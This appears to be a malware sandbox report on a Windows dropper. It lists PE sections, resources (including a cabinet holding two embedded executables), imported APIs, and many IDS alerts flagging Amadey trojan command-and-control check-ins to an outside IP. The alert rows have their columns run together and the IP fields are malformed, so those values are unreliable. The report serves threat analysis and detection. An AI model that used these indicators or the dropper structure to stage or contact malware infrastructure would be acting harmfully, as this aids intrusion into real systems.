IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x6314 | 0x6400 | False | 0.5744140625 | data | 6.314163792045976 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data | 0x8000 | 0x1a48 | 0x200 | False | 0.609375 | data | 4.970639543960129 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0xa000 | 0x1052 | 0x1200 | False | 0.4140625 | data | 5.025949912909207 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc | 0xc000 | 0x86000 | 0x85c00 | False | 0.9308100905373832 | data | 7.871206042948107 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x92000 | 0x888 | 0xa00 | False | 0.746484375 | data | 6.222637930812128 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country
AVI | 0xcb30 | 0x2e1a | RIFF (little-endian) data, AVI, 272 x 60, 10.00 fps, video: RLE 8bpp | English | United States
RT_ICON | 0xf94c | 0x668 | Device independent bitmap graphic, 48 x 96 x 4, image size 1152 | English | United States
RT_ICON | 0xffb4 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 512 | English | United States
RT_ICON | 0x1029c | 0x1e8 | Device independent bitmap graphic, 24 x 48 x 4, image size 288 | English | United States
RT_ICON | 0x10484 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128 | English | United States
RT_ICON | 0x105ac | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | English | United States
RT_ICON | 0x11454 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | English | United States
RT_ICON | 0x11cfc | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors | English | United States
RT_ICON | 0x123c4 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | English | United States
RT_ICON | 0x1292c | 0xd9d2 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States
RT_ICON | 0x20300 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | United States
RT_ICON | 0x228a8 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | United States
RT_ICON | 0x23950 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2400 | English | United States
RT_ICON | 0x242d8 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States
RT_DIALOG | 0x24740 | 0x2f2 | data | English | United States
RT_DIALOG | 0x24a34 | 0x35c | data | Russian | Russia
RT_DIALOG | 0x24d90 | 0x1b0 | data | English | United States
RT_DIALOG | 0x24f40 | 0x1b4 | data | Russian | Russia
RT_DIALOG | 0x250f4 | 0x166 | data | English | United States
RT_DIALOG | 0x2525c | 0x168 | data | Russian | Russia
RT_DIALOG | 0x253c4 | 0x1c0 | data | English | United States
RT_DIALOG | 0x25584 | 0x1e0 | data | Russian | Russia
RT_DIALOG | 0x25764 | 0x130 | data | English | United States
RT_DIALOG | 0x25894 | 0x150 | data | Russian | Russia
RT_DIALOG | 0x259e4 | 0x120 | data | English | United States
RT_DIALOG | 0x25b04 | 0x122 | data | Russian | Russia
RT_STRING | 0x25c28 | 0x8c | Matlab v4 mat-file (little endian) l, numeric, rows 0, columns 0 | English | United States
RT_STRING | 0x25cb4 | 0x86 | Matlab v4 mat-file (little endian) K\0041\0045\004@\0048\004B\0045\004 , numeric, rows 0, columns 0 | Russian | Russia
RT_STRING | 0x25d3c | 0x520 | data | English | United States
RT_STRING | 0x2625c | 0x52e | data | Russian | Russia
RT_STRING | 0x2678c | 0x5cc | data | English | United States
RT_STRING | 0x26d58 | 0x592 | data | Russian | Russia
RT_STRING | 0x272ec | 0x4b0 | data | English | United States
RT_STRING | 0x2779c | 0x4b2 | data | Russian | Russia
RT_STRING | 0x27c50 | 0x44a | data | English | United States
RT_STRING | 0x2809c | 0x43e | data | Russian | Russia
RT_STRING | 0x284dc | 0x3ce | data | English | United States
RT_STRING | 0x288ac | 0x2fc | data | Russian | Russia
RT_RCDATA | 0x28ba8 | 0x7 | ASCII text, with no line terminators | English | United States
RT_RCDATA | 0x28bb0 | 0x67ecc | Microsoft Cabinet archive data, many, 425676 bytes, 2 files, at 0x2c +A "bmMg.exe" +A "xriv.exe", ID 1580, number 1, 20 datablocks, 0x1503 compression | English | United States
RT_RCDATA | 0x90a7c | 0x4 | data | English | United States
RT_RCDATA | 0x90a80 | 0x24 | data | English | United States
RT_RCDATA | 0x90aa4 | 0x7 | ASCII text, with no line terminators | English | United States
RT_RCDATA | 0x90aac | 0x7 | ASCII text, with no line terminators | English | United States
RT_RCDATA | 0x90ab4 | 0x4 | data | English | United States
RT_RCDATA | 0x90ab8 | 0x9 | ASCII text, with no line terminators | English | United States
RT_RCDATA | 0x90ac4 | 0x4 | data | English | United States
RT_RCDATA | 0x90ac8 | 0x9 | ASCII text, with no line terminators | English | United States
RT_RCDATA | 0x90ad4 | 0x4 | data | English | United States
RT_RCDATA | 0x90ad8 | 0x6 | data | English | United States
RT_RCDATA | 0x90ae0 | 0x7 | ASCII text, with no line terminators | English | United States
RT_RCDATA | 0x90ae8 | 0x7 | ASCII text, with no line terminators | English | United States
RT_GROUP_ICON | 0x90af0 | 0xbc | data | English | United States
RT_VERSION | 0x90bac | 0x408 | data | English | United States
RT_VERSION | 0x90fb4 | 0x410 | data | Russian | Russia
RT_MANIFEST | 0x913c4 | 0x7e2 | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States
DLL | Import
ADVAPI32.dll | GetTokenInformation, RegDeleteValueA, RegOpenKeyExA, RegQueryInfoKeyA, FreeSid, OpenProcessToken, RegSetValueExA, RegCreateKeyExA, LookupPrivilegeValueA, AllocateAndInitializeSid, RegQueryValueExA, EqualSid, RegCloseKey, AdjustTokenPrivileges
KERNEL32.dll | _lopen, _llseek, CompareStringA, GetLastError, GetFileAttributesA, GetSystemDirectoryA, LoadLibraryA, DeleteFileA, GlobalAlloc, GlobalFree, CloseHandle, WritePrivateProfileStringA, IsDBCSLeadByte, GetWindowsDirectoryA, SetFileAttributesA, GetProcAddress, GlobalLock, LocalFree, RemoveDirectoryA, FreeLibrary, _lclose, CreateDirectoryA, GetPrivateProfileIntA, GetPrivateProfileStringA, GlobalUnlock, ReadFile, SizeofResource, WriteFile, GetDriveTypeA, lstrcmpA, SetFileTime, SetFilePointer, FindResourceA, CreateMutexA, GetVolumeInformationA, ExpandEnvironmentStringsA, GetCurrentDirectoryA, FreeResource, GetVersion, SetCurrentDirectoryA, GetTempPathA, LocalFileTimeToFileTime, CreateFileA, SetEvent, TerminateThread, GetVersionExA, LockResource, GetSystemInfo, CreateThread, ResetEvent, LoadResource, ExitProcess, GetModuleHandleW, CreateProcessA, FormatMessageA, GetTempFileNameA, DosDateTimeToFileTime, CreateEventA, GetExitCodeProcess, FindNextFileA, LocalAlloc, GetShortPathNameA, MulDiv, GetDiskFreeSpaceA, EnumResourceLanguagesA, GetTickCount, GetSystemTimeAsFileTime, GetCurrentThreadId, GetCurrentProcessId, QueryPerformanceCounter, TerminateProcess, SetUnhandledExceptionFilter, UnhandledExceptionFilter, GetStartupInfoW, Sleep, FindClose, GetCurrentProcess, FindFirstFileA, WaitForSingleObject, GetModuleFileNameA, LoadLibraryExA
GDI32.dll | GetDeviceCaps
USER32.dll | SetWindowLongA, GetDlgItemTextA, DialogBoxIndirectParamA, ShowWindow, MsgWaitForMultipleObjects, SetWindowPos, GetDC, GetWindowRect, DispatchMessageA, GetDesktopWindow, CharUpperA, SetDlgItemTextA, ExitWindowsEx, MessageBeep, EndDialog, CharPrevA, LoadStringA, CharNextA, EnableWindow, ReleaseDC, SetForegroundWindow, PeekMessageA, GetDlgItem, SendMessageA, SendDlgItemMessageA, MessageBoxA, SetWindowTextA, GetWindowLongA, CallWindowProcA, GetSystemMetrics
msvcrt.dll | _controlfp, ?terminate@@YAXXZ, _acmdln, _initterm, __setusermatherr, _except_handler4_common, memcpy, _ismbblead, __p__fmode, _cexit, _exit, exit, __set_app_type, __getmainargs, _amsg_exit, __p__commode, _XcptFilter, memcpy_s, _vsnprintf, memset
COMCTL32.dll |
Cabinet.dll |
VERSION.dll | GetFileVersionInfoA, VerQueryValueA, GetFileVersionInfoSizeA
Language of compilation system | Country where language is spoken
English | United States
Russian | Russia
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                                                                    192.168.2.362.204.41.449899802027700 02/08/23-21:32:10.520938TCP2027700ET TROJAN Amadey CnC Check-In4989980192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449861802027700 02/08/23-21:32:01.357771TCP2027700ET TROJAN Amadey CnC Check-In4986180192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449772802027700 02/08/23-21:31:37.016273TCP2027700ET TROJAN Amadey CnC Check-In4977280192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449916802027700 02/08/23-21:32:17.326423TCP2027700ET TROJAN Amadey CnC Check-In4991680192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449950802027700 02/08/23-21:32:25.900036TCP2027700ET TROJAN Amadey CnC Check-In4995080192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449763802027700 02/08/23-21:31:31.780351TCP2027700ET TROJAN Amadey CnC Check-In4976380192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449852802027700 02/08/23-21:31:59.185304TCP2027700ET TROJAN Amadey CnC Check-In4985280192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449941802027700 02/08/23-21:32:23.532205TCP2027700ET TROJAN Amadey CnC Check-In4994180192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449925802027700 02/08/23-21:32:19.523158TCP2027700ET TROJAN Amadey CnC Check-In4992580192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449922802027700 02/08/23-21:32:18.772895TCP2027700ET TROJAN Amadey CnC Check-In4992280192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449738802027700 02/08/23-21:31:25.612828TCP2027700ET TROJAN Amadey CnC Check-In4973880192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449836802027700 02/08/23-21:31:53.163923TCP2027700ET TROJAN Amadey CnC Check-In4983680192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449827802027700 02/08/23-21:31:50.529167TCP2027700ET TROJAN Amadey CnC Check-In4982780192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449833802027700 02/08/23-21:31:51.983787TCP2027700ET TROJAN Amadey CnC Check-In4983380192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449931802027700 02/08/23-21:32:21.032345TCP2027700ET TROJAN Amadey CnC Check-In4993180192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449744802027700 02/08/23-21:31:27.200875TCP2027700ET TROJAN Amadey CnC Check-In4974480192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449747802027700 02/08/23-21:31:27.935502TCP2027700ET TROJAN Amadey CnC Check-In4974780192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449919802027700 02/08/23-21:32:18.035543TCP2027700ET TROJAN Amadey CnC Check-In4991980192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449794802027700 02/08/23-21:31:42.450951TCP2027700ET TROJAN Amadey CnC Check-In4979480192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449880802027700 02/08/23-21:32:05.941168TCP2027700ET TROJAN Amadey CnC Check-In4988080192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449750802027700 02/08/23-21:31:28.669505TCP2027700ET TROJAN Amadey CnC Check-In4975080192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449791802027700 02/08/23-21:31:41.723772TCP2027700ET TROJAN Amadey CnC Check-In4979180192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449785802027700 02/08/23-21:31:40.215518TCP2027700ET TROJAN Amadey CnC Check-In4978580192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449874802027700 02/08/23-21:32:04.500033TCP2027700ET TROJAN Amadey CnC Check-In4987480192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449963802027700 02/08/23-21:32:29.504401TCP2027700ET TROJAN Amadey CnC Check-In4996380192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449814802027700 02/08/23-21:31:47.295499TCP2027700ET TROJAN Amadey CnC Check-In4981480192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449849802027700 02/08/23-21:31:58.454915TCP2027700ET TROJAN Amadey CnC Check-In4984980192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449725802027700 02/08/23-21:31:22.403677TCP2027700ET TROJAN Amadey CnC Check-In4972580192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449938802027700 02/08/23-21:32:22.819598TCP2027700ET TROJAN Amadey CnC Check-In4993880192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449903802027700 02/08/23-21:32:11.766469TCP2027700ET TROJAN Amadey CnC Check-In4990380192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449855802027700 02/08/23-21:31:59.888895TCP2027700ET TROJAN Amadey CnC Check-In4985580192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449944802027700 02/08/23-21:32:24.249933TCP2027700ET TROJAN Amadey CnC Check-In4994480192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449808802027700 02/08/23-21:31:45.869321TCP2027700ET TROJAN Amadey CnC Check-In4980880192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449766802027700 02/08/23-21:31:32.973144TCP2027700ET TROJAN Amadey CnC Check-In4976680192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449719802027700 02/08/23-21:31:17.030553TCP2027700ET TROJAN Amadey CnC Check-In4971980192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449939802027700 02/08/23-21:32:23.062857TCP2027700ET TROJAN Amadey CnC Check-In4993980192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449731802027700 02/08/23-21:31:23.865413TCP2027700ET TROJAN Amadey CnC Check-In4973180192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449746802027700 02/08/23-21:31:27.686672TCP2027700ET TROJAN Amadey CnC Check-In4974680192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449844802027700 02/08/23-21:31:57.262976TCP2027700ET TROJAN Amadey CnC Check-In4984480192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449942802027700 02/08/23-21:32:23.769179TCP2027700ET TROJAN Amadey CnC Check-In4994280192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449792802027700 02/08/23-21:31:41.968819TCP2027700ET TROJAN Amadey CnC Check-In4979280192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449890802027700 02/08/23-21:32:08.343447TCP2027700ET TROJAN Amadey CnC Check-In4989080192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449703802027700 02/08/23-21:31:09.854969TCP2027700ET TROJAN Amadey CnC Check-In4970380192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449774802027700 02/08/23-21:31:37.538022TCP2027700ET TROJAN Amadey CnC Check-In4977480192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449872802027700 02/08/23-21:32:04.015502TCP2027700ET TROJAN Amadey CnC Check-In4987280192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449801802027700 02/08/23-21:31:44.140311TCP2027700ET TROJAN Amadey CnC Check-In4980180192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449859802027700 02/08/23-21:32:00.842850TCP2027700ET TROJAN Amadey CnC Check-In4985980192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449957802027700 02/08/23-21:32:27.889281TCP2027700ET TROJAN Amadey CnC Check-In4995780192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449779802027700 02/08/23-21:31:38.749643TCP2027700ET TROJAN Amadey CnC Check-In4977980192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449877802027700 02/08/23-21:32:05.223019TCP2027700ET TROJAN Amadey CnC Check-In4987780192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449952802027700 02/08/23-21:32:26.521263TCP2027700ET TROJAN Amadey CnC Check-In4995280192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449756802027700 02/08/23-21:31:30.104619TCP2027700ET TROJAN Amadey CnC Check-In4975680192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449816802027700 02/08/23-21:31:47.785160TCP2027700ET TROJAN Amadey CnC Check-In4981680192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449929802027700 02/08/23-21:32:20.553590TCP2027700ET TROJAN Amadey CnC Check-In4992980192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449834802027700 02/08/23-21:31:52.577365TCP2027700ET TROJAN Amadey CnC Check-In4983480192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449741802027700 02/08/23-21:31:26.473669TCP2027700ET TROJAN Amadey CnC Check-In4974180192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449869802027700 02/08/23-21:32:03.296837TCP2027700ET TROJAN Amadey CnC Check-In4986980192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449960802027700 02/08/23-21:32:28.668791TCP2027700ET TROJAN Amadey CnC Check-In4996080192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449782802027700 02/08/23-21:31:39.471649TCP2027700ET TROJAN Amadey CnC Check-In4978280192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449764802027700 02/08/23-21:31:32.057321TCP2027700ET TROJAN Amadey CnC Check-In4976480192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449811802027700 02/08/23-21:31:46.576529TCP2027700ET TROJAN Amadey CnC Check-In4981180192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449887802027700 02/08/23-21:32:07.638708TCP2027700ET TROJAN Amadey CnC Check-In4988780192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449924802027700 02/08/23-21:32:19.271281TCP2027700ET TROJAN Amadey CnC Check-In4992480192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449769802027700 02/08/23-21:31:34.756431TCP2027700ET TROJAN Amadey CnC Check-In4976980192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449906802027700 02/08/23-21:32:12.698779TCP2027700ET TROJAN Amadey CnC Check-In4990680192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449728802027700 02/08/23-21:31:23.125330TCP2027700ET TROJAN Amadey CnC Check-In4972880192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449882802027700 02/08/23-21:32:06.440098TCP2027700ET TROJAN Amadey CnC Check-In4988280192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449947802027700 02/08/23-21:32:25.015743TCP2027700ET TROJAN Amadey CnC Check-In4994780192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449965802027700 02/08/23-21:32:30.025255TCP2027700ET TROJAN Amadey CnC Check-In4996580192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449904802027700 02/08/23-21:32:12.046729TCP2027700ET TROJAN Amadey CnC Check-In4990480192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449711802027700 02/08/23-21:31:11.882854TCP2027700ET TROJAN Amadey CnC Check-In4971180192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449867802027700 02/08/23-21:32:02.794106TCP2027700ET TROJAN Amadey CnC Check-In4986780192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449864802027700 02/08/23-21:32:02.060206TCP2027700ET TROJAN Amadey CnC Check-In4986480192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449962802027700 02/08/23-21:32:29.257081TCP2027700ET TROJAN Amadey CnC Check-In4996280192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449705802027700 02/08/23-21:31:10.447077TCP2027700ET TROJAN Amadey CnC Check-In4970580192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449818802027700 02/08/23-21:31:48.341113TCP2027700ET TROJAN Amadey CnC Check-In4981880192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449959802027700 02/08/23-21:32:28.422447TCP2027700ET TROJAN Amadey CnC Check-In4995980192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449870802027700 02/08/23-21:32:03.546238TCP2027700ET TROJAN Amadey CnC Check-In4987080192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449726802027700 02/08/23-21:31:22.634931TCP2027700ET TROJAN Amadey CnC Check-In4972680192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449821802027700 02/08/23-21:31:49.045771TCP2027700ET TROJAN Amadey CnC Check-In4982180192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449824802027700 02/08/23-21:31:49.780553TCP2027700ET TROJAN Amadey CnC Check-In4982480192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449754802027700 02/08/23-21:31:29.621347TCP2027700ET TROJAN Amadey CnC Check-In4975480192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449751802027700 02/08/23-21:31:28.918585TCP2027700ET TROJAN Amadey CnC Check-In4975180192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449895802027700 02/08/23-21:32:09.563402TCP2027700ET TROJAN Amadey CnC Check-In4989580192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449934802027700 02/08/23-21:32:21.786854TCP2027700ET TROJAN Amadey CnC Check-In4993480192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449937802027700 02/08/23-21:32:22.552019TCP2027700ET TROJAN Amadey CnC Check-In4993780192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449892802027700 02/08/23-21:32:08.821841TCP2027700ET TROJAN Amadey CnC Check-In4989280192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449839802027700 02/08/23-21:31:55.963337TCP2027700ET TROJAN Amadey CnC Check-In4983980192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449797802027700 02/08/23-21:31:43.170405TCP2027700ET TROJAN Amadey CnC Check-In4979780192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449854802027700 02/08/23-21:31:59.659125TCP2027700ET TROJAN Amadey CnC Check-In4985480192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449721802027700 02/08/23-21:31:17.546135TCP2027700ET TROJAN Amadey CnC Check-In4972180192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449940802027700 02/08/23-21:32:23.296032TCP2027700ET TROJAN Amadey CnC Check-In4994080192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449889802027700 02/08/23-21:32:08.107631TCP2027700ET TROJAN Amadey CnC Check-In4988980192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449718802027700 02/08/23-21:31:15.921504TCP2027700ET TROJAN Amadey CnC Check-In4971880192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449759802027700 02/08/23-21:31:30.808118TCP2027700ET TROJAN Amadey CnC Check-In4975980192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449932802027700 02/08/23-21:32:21.312523TCP2027700ET TROJAN Amadey CnC Check-In4993280192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449926802027700 02/08/23-21:32:19.767739TCP2027700ET TROJAN Amadey CnC Check-In4992680192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449713802027700 02/08/23-21:31:12.783643TCP2027700ET TROJAN Amadey CnC Check-In4971380192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449897802027700 02/08/23-21:32:10.032773TCP2027700ET TROJAN Amadey CnC Check-In4989780192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449967802027700 02/08/23-21:32:30.528686TCP2027700ET TROJAN Amadey CnC Check-In4996780192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449790802027700 02/08/23-21:31:41.465182TCP2027700ET TROJAN Amadey CnC Check-In4979080192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449862802027700 02/08/23-21:32:01.593618TCP2027700ET TROJAN Amadey CnC Check-In4986280192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449789802027700 02/08/23-21:31:41.224340TCP2027700ET TROJAN Amadey CnC Check-In4978980192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449748802027700 02/08/23-21:31:28.171578TCP2027700ET TROJAN Amadey CnC Check-In4974880192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449784802027700 02/08/23-21:31:39.982751TCP2027700ET TROJAN Amadey CnC Check-In4978480192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449826802027700 02/08/23-21:31:50.292455TCP2027700ET TROJAN Amadey CnC Check-In4982680192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449909802027700 02/08/23-21:32:14.933906TCP2027700ET TROJAN Amadey CnC Check-In4990980192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449832802027700 02/08/23-21:31:51.751305TCP2027700ET TROJAN Amadey CnC Check-In4983280192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449743802027700 02/08/23-21:31:26.963197TCP2027700ET TROJAN Amadey CnC Check-In4974380192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449930802027700 02/08/23-21:32:20.796642TCP2027700ET TROJAN Amadey CnC Check-In4993080192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449838802027700 02/08/23-21:31:54.373776TCP2027700ET TROJAN Amadey CnC Check-In4983880192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449936802027700 02/08/23-21:32:22.307700TCP2027700ET TROJAN Amadey CnC Check-In4993680192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449927802027700 02/08/23-21:32:20.024415TCP2027700ET TROJAN Amadey CnC Check-In4992780192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449829802027700 02/08/23-21:31:51.027291TCP2027700ET TROJAN Amadey CnC Check-In4982980192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449945802027700 02/08/23-21:32:24.485227TCP2027700ET TROJAN Amadey CnC Check-In4994580192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449856802027700 02/08/23-21:32:00.132402TCP2027700ET TROJAN Amadey CnC Check-In4985680192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449749802027700 02/08/23-21:31:28.419020TCP2027700ET TROJAN Amadey CnC Check-In4974980192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449847802027700 02/08/23-21:31:57.967039TCP2027700ET TROJAN Amadey CnC Check-In4984780192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449758802027700 02/08/23-21:31:30.574106TCP2027700ET TROJAN Amadey CnC Check-In4975880192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449786802027700 02/08/23-21:31:40.457663TCP2027700ET TROJAN Amadey CnC Check-In4978680192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449767802027700 02/08/23-21:31:33.408799TCP2027700ET TROJAN Amadey CnC Check-In4976780192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449875802027700 02/08/23-21:32:04.746050TCP2027700ET TROJAN Amadey CnC Check-In4987580192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449780802027700 02/08/23-21:31:38.981621TCP2027700ET TROJAN Amadey CnC Check-In4978080192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449710802027700 02/08/23-21:31:11.651177TCP2027700ET TROJAN Amadey CnC Check-In4971080192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449860802027700 02/08/23-21:32:01.115035TCP2027700ET TROJAN Amadey CnC Check-In4986080192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449911802027700 02/08/23-21:32:16.121219TCP2027700ET TROJAN Amadey CnC Check-In4991180192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449813802027700 02/08/23-21:31:47.049281TCP2027700ET TROJAN Amadey CnC Check-In4981380192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449902802027700 02/08/23-21:32:11.276709TCP2027700ET TROJAN Amadey CnC Check-In4990280192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449771802027700 02/08/23-21:31:36.658549TCP2027700ET TROJAN Amadey CnC Check-In4977180192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449822802027700 02/08/23-21:31:49.295197TCP2027700ET TROJAN Amadey CnC Check-In4982280192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449733802027700 02/08/23-21:31:24.349655TCP2027700ET TROJAN Amadey CnC Check-In4973380192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449946802027700 02/08/23-21:32:24.773081TCP2027700ET TROJAN Amadey CnC Check-In4994680192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449857802027700 02/08/23-21:32:00.376328TCP2027700ET TROJAN Amadey CnC Check-In4985780192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449898802027700 02/08/23-21:32:10.281507TCP2027700ET TROJAN Amadey CnC Check-In4989880192.168.2.362.204.41.4
